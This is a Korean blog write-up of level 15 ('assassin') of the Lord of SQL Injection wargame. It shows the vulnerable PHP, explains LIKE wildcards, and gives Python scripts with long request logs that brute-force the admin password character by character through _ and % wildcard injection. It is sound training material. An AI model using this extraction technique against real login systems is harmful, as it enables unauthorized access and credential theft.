Oh! JUN

[Lord Of SQL Injection] 15번 본문

문제풀이/Lord of SQL Injection

[Lord Of SQL Injection] 15번

Kwon Oh! JUN 2022. 2. 5. 02:58

query : select id from prob_assassin where pw like ''


<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect(); 
  if(preg_match('/\'/i'$_GET[pw])) exit("No Hack ~_~"); 
  $query "select id from prob_assassin where pw like '{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
  if($result['id'] == 'admin'solve("assassin"); 
  highlight_file(__FILE__); 
?>

like문구 있길래 등호 우회한 문젠가 하고 여러가지 시도해 보았지만 아닌거 같아서 찾아보니까 와일드 카드 개념을 적용시킬 수 있었다.

 

https://www.w3schools.com/sql/sql_wildcards.asp

 

SQL Wildcard Characters

W3Schools offers free online tutorials, references and exercises in all the major languages of the web. Covering popular subjects like HTML, CSS, JavaScript, Python, SQL, Java, and many, many more.

www.w3schools.com

SymbolDescriptionExample

% Represents zero or more characters bl% finds bl, black, blue, and blob
_ Represents a single character h_t finds hot, hat, and hit
[] Represents any single character within the brackets h[oa]t finds hot and hat, but not hit
^ Represents any character not in the brackets h[^oa]t finds hit, but not hot and hat
- Represents any single character within the specified range c[a-b]t finds cat and cbt

 

LIKE OperatorDescription

WHERE CustomerName LIKE 'a%' Finds any values that starts with "a"
WHERE CustomerName LIKE '%a' Finds any values that ends with "a"
WHERE CustomerName LIKE '%or%' Finds any values that have "or" in any position
WHERE CustomerName LIKE '_r%' Finds any values that have "r" in the second position
WHERE CustomerName LIKE 'a__%' Finds any values that starts with "a" and are at least 3 characters in length
WHERE ContactName LIKE 'a%o' Finds any values that starts with "a" and ends with "o"

 

ex)

DB 이름 : imformation_DB

id pw
admin bird1234
guest dog5678

● select id from information_DB where pw like '________'

☞ admin 

*_ 밑줄 8개니까 8개에 해당하는 pw는 admin이니까 admin 출력

 

● select id from information_DB where pw like '%d'

☞ guest

 

● select id from information_DB where pw like '%dog'

☞ guest

 

● select id from information_DB where pw like '%34'

☞ admin

 

패스워드 길이 구하기

import requests
import string

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="쿠키값")
asc = string.digits+string.ascii_letters
word = '_'
underline = '_'
i = 0
count = 0

while i < 100:
    param = "?pw="+word
    res_url = url + param
    word+=underline
    count+=1
    print(param)
    print(str(count)+"개\n")
    response = requests.get(res_url, cookies=cookie)
    if response.text.find("Hello guest") > 0:
        break
print("password 길이: "+str(count)+"자리")
i+=1
?pw=_
1개

?pw=__
2개

?pw=___
3개

?pw=____
4개

?pw=_____
5개

?pw=______
6개

?pw=_______
7개

?pw=________
8개

password 길이: 8자리

 

패스워드 구하기

import requests
import string

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="쿠키값")
count = 1
asc = string.digits+string.ascii_letters
word = ''

for count in range(1,9):
    for i in asc:
        param = "?pw="+str(word)+i+"%"
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        print(res_url)
        
        if response.text.find("Hello admin") > 0:
            word+=i
            print(word)
            break
print("패스워드: "+word)

☞ 안 잡힘 그래서 guest로 바꿔보았다.

 

import requests
import string

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="qhqu5hair6nce0o06k79m6mni7")
count = 1
asc = string.digits+string.ascii_letters
word = ''

for count in range(1,9):
    for i in asc:
        param = "?pw="+str(word)+i+"%"
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        print(res_url)
        
        if response.text.find("Hello guest") > 0:
            word+=i
            print(word)
            break
            
print("패스워드: "+word)
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=9%
9
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90%
90
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=900%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=901%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=902%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=903%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=904%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=905%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=906%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=907%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=908%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=909%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90a%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90b%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90c%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d%
90d
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2%
90d2
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d20%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d21%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d22%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d23%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d24%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d25%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d26%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d27%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d28%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d29%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2a%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2b%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2c%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2d%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2e%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f%
90d2f
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2f9%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fa%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fb%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fc%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fd%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe%
90d2fe
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe1%
90d2fe1
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=90d2fe10%
90d2fe10
패스워드: 90d2fe10

☞ guest 패스워드는 잡힌다.

 

id pw
guest 90d2fe10
admin ?

*현재로서 admin는 패스워드가 안 잡히고, guest는 90d2fe10 패스워드가 잡힌다.

유추해 보았을 때 guest의 패스워드가 admin의 패스워드와 일부 중복이 되어서 와일드 카드 방식으로 했을 때 guest로 읽히는거 같다. 그래서 이번에는 guest일때는 '_'를 추가시키고, admin일때 패스워드를 파싱 할 수 있도록 코드를 짜보았다.

import requests
import string

url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php"
cookie = dict(PHPSESSID="쿠키값")
count = 1
asc = string.digits+string.ascii_letters
word = ''

for count in range(1,9):
    for i in asc:
        param = "?pw="+str(word)+i+"%"
        res_url = url + param
        response = requests.get(res_url, cookies=cookie)
        print(res_url)
        
        if response.text.find("Hello admin") > 0:
            word+=i
            print(word)
            break

        elif response.text.find("Hello guest") > 0:
            word+="_"
            print(word)
            break
        
print("패스워드: "+word)
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=9%
_
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=_0%
__
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2%
__2
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__20%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__21%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__22%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__23%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__24%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__25%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__26%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__27%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__28%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__29%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2a%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2b%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2c%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2d%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e%
__2e
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2e9%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ea%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2eb%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ec%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ed%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ee%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef%
__2ef
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef1%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef2%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef3%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef4%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef5%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef6%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef7%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef8%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2ef9%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efa%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efb%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efc%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd%
__2efd
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd0%
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd1%
__2efd1
https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=__2efd10%
__2efd10
패스워드: __2efd10
id pw
guest 90d2fe10
admin 902efd10

*admin의 중복부분은 90_______이었다. 

 

 

 

 

 

 

 

 

'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글

[Lord Of SQL Injection] 17번(더블쿼터, Nullbyte)  (0) 2022.02.05
[Lord Of SQL Injection] 16번 문제(싱글쿼터 우회)  (0) 2022.02.05
[Lord Of SQL Injection] 14번  (0) 2022.02.03
[Lord Of SQL Injection] 13번  (0) 2022.02.03
[Lord Of SQL Injection] 12번(자세한 설명,수정완료)  (0) 2022.02.02
'문제풀이/Lord of SQL Injection' Related Articles more